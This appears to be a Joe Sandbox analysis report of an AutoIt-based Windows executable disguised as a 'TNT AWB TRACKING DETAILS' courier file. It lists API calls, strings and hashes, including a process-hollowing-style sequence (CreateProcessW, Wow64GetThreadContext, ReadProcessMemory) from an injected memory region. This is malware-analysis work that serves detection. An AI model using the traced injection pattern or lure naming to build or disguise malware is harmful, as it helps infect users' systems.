Control-flow Graph (executed / not executed paths; graph rendering not reproduced): SHGetMalloc -> SHGetDesktopFolder -> SHGetPathFromIDListW
                                      APIs
                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                      • _wcsncpy.LIBCMT ref: 004102ED
                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                      • _wcsncpy.LIBCMT ref: 00410340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                      • String ID: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 3170942423-3238095357
                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

Control-flow Graph (executed / not executed paths; graph rendering not reproduced): call 401b80 -> Shell_NotifyIconW (several branches) -> KillTimer -> SetTimer
                                      APIs
                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 3300667738-0
                                      • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                      • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorLast
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 2487901850-572801152
                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                      APIs
                                        • Part of subcall function 03F3BB10: Sleep.KERNELBASE(000001F4), ref: 03F3BB21
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F3BD75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: UBM8B4AU2TOSGKDHHWU65WWEWJR1Y
                                      • API String ID: 2694422964-2818237491
                                      • Opcode ID: 1676a867c94d8d96a846387ef2b5f629b677fcffaa440bda4ff36f48a428f8cc
                                      • Instruction ID: b8aae9244561345d2aa1a5b20e0a441dd90ae2a89fc911978adfa908dccbf9ed
                                      • Opcode Fuzzy Hash: 1676a867c94d8d96a846387ef2b5f629b677fcffaa440bda4ff36f48a428f8cc
                                      • Instruction Fuzzy Hash: 42617230D08288DAEF15DBB4D858BEFBB75AF15304F044199E6487B2C1D7B90A48CB65
                                      APIs
                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcsncpy.LIBCMT ref: 00401C41
                                      • _wcscpy.LIBCMT ref: 00401C5D
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                      • String ID: Line:
                                      • API String ID: 1874344091-1585850449
                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Close$OpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 1607946009-824357125
                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F3B2CB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F3B361
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F3B383
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                      • Instruction ID: ac5ef66d3c6cdc6575b83e110a5bd9eb5943201294c172c825db97d44571c0c2
                                      • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                      • Instruction Fuzzy Hash: 7762F830A14258DBEB24CFA4C850BDEB376EF59300F1091A9D10DEB3A4E7769E81CB59
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                      APIs
                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                      • _free.LIBCMT ref: 004295A0
                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 3938964917-3187515760
                                      • Opcode ID: 270dd0ea9a5e8039f531707175cdd08c3ef27e69020102fad8003a9fe26c702a
                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                      • Opcode Fuzzy Hash: 270dd0ea9a5e8039f531707175cdd08c3ef27e69020102fad8003a9fe26c702a
                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: Error:
                                      • API String ID: 4104443479-232661952
                                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                      APIs
                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,0040F545,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,004A90E8,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                      Similarity
                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                      • String ID: X$pWH
                                      • API String ID: 85490731-941433119
                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                      APIs
                                      • _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 00401B57
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                      • String ID: @EXITCODE
                                      • API String ID: 2734553683-3436989551
                                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                      Strings
                                      • C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, xrefs: 00410107
                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                      Similarity
                                      • API ID: _strcat
                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 1765576173-1195542274
                                      • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                      • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                      Similarity
                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                      Similarity
                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 1794320848-0
                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                      Similarity
                                      • API ID: Process$CurrentTerminate
                                      • String ID:
                                      • API String ID: 2429186680-0
                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                      • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                      • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                      • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                      APIs
                                      • _malloc.LIBCMT ref: 0043214B
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _malloc.LIBCMT ref: 0043215D
                                      • _malloc.LIBCMT ref: 0043216F
                                      Similarity
                                      • API ID: _malloc$AllocateHeap
                                      • String ID:
                                      • API String ID: 680241177-0
                                      • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                      • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                      APIs
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 4217535847-0
                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                      APIs
                                      • _free.LIBCMT ref: 0043210A
                                        • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                        • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                      • _free.LIBCMT ref: 0043211D
                                      • _free.LIBCMT ref: 00432130
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                      • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                      • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                      • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                      • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      APIs
                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                      • _strcat.LIBCMT ref: 0040F786
                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                      • String ID:
                                      • API String ID: 3199840319-0
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FreeInfoLibraryParametersSystem
                                      • String ID:
                                      • API String ID: 3403648963-0
                                      APIs
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      • __lock_file.LIBCMT ref: 00414A8D
                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      APIs
                                      • __lock_file.LIBCMT ref: 00415012
                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2999321469-0
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F3B2CB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F3B361
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F3B383
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      APIs
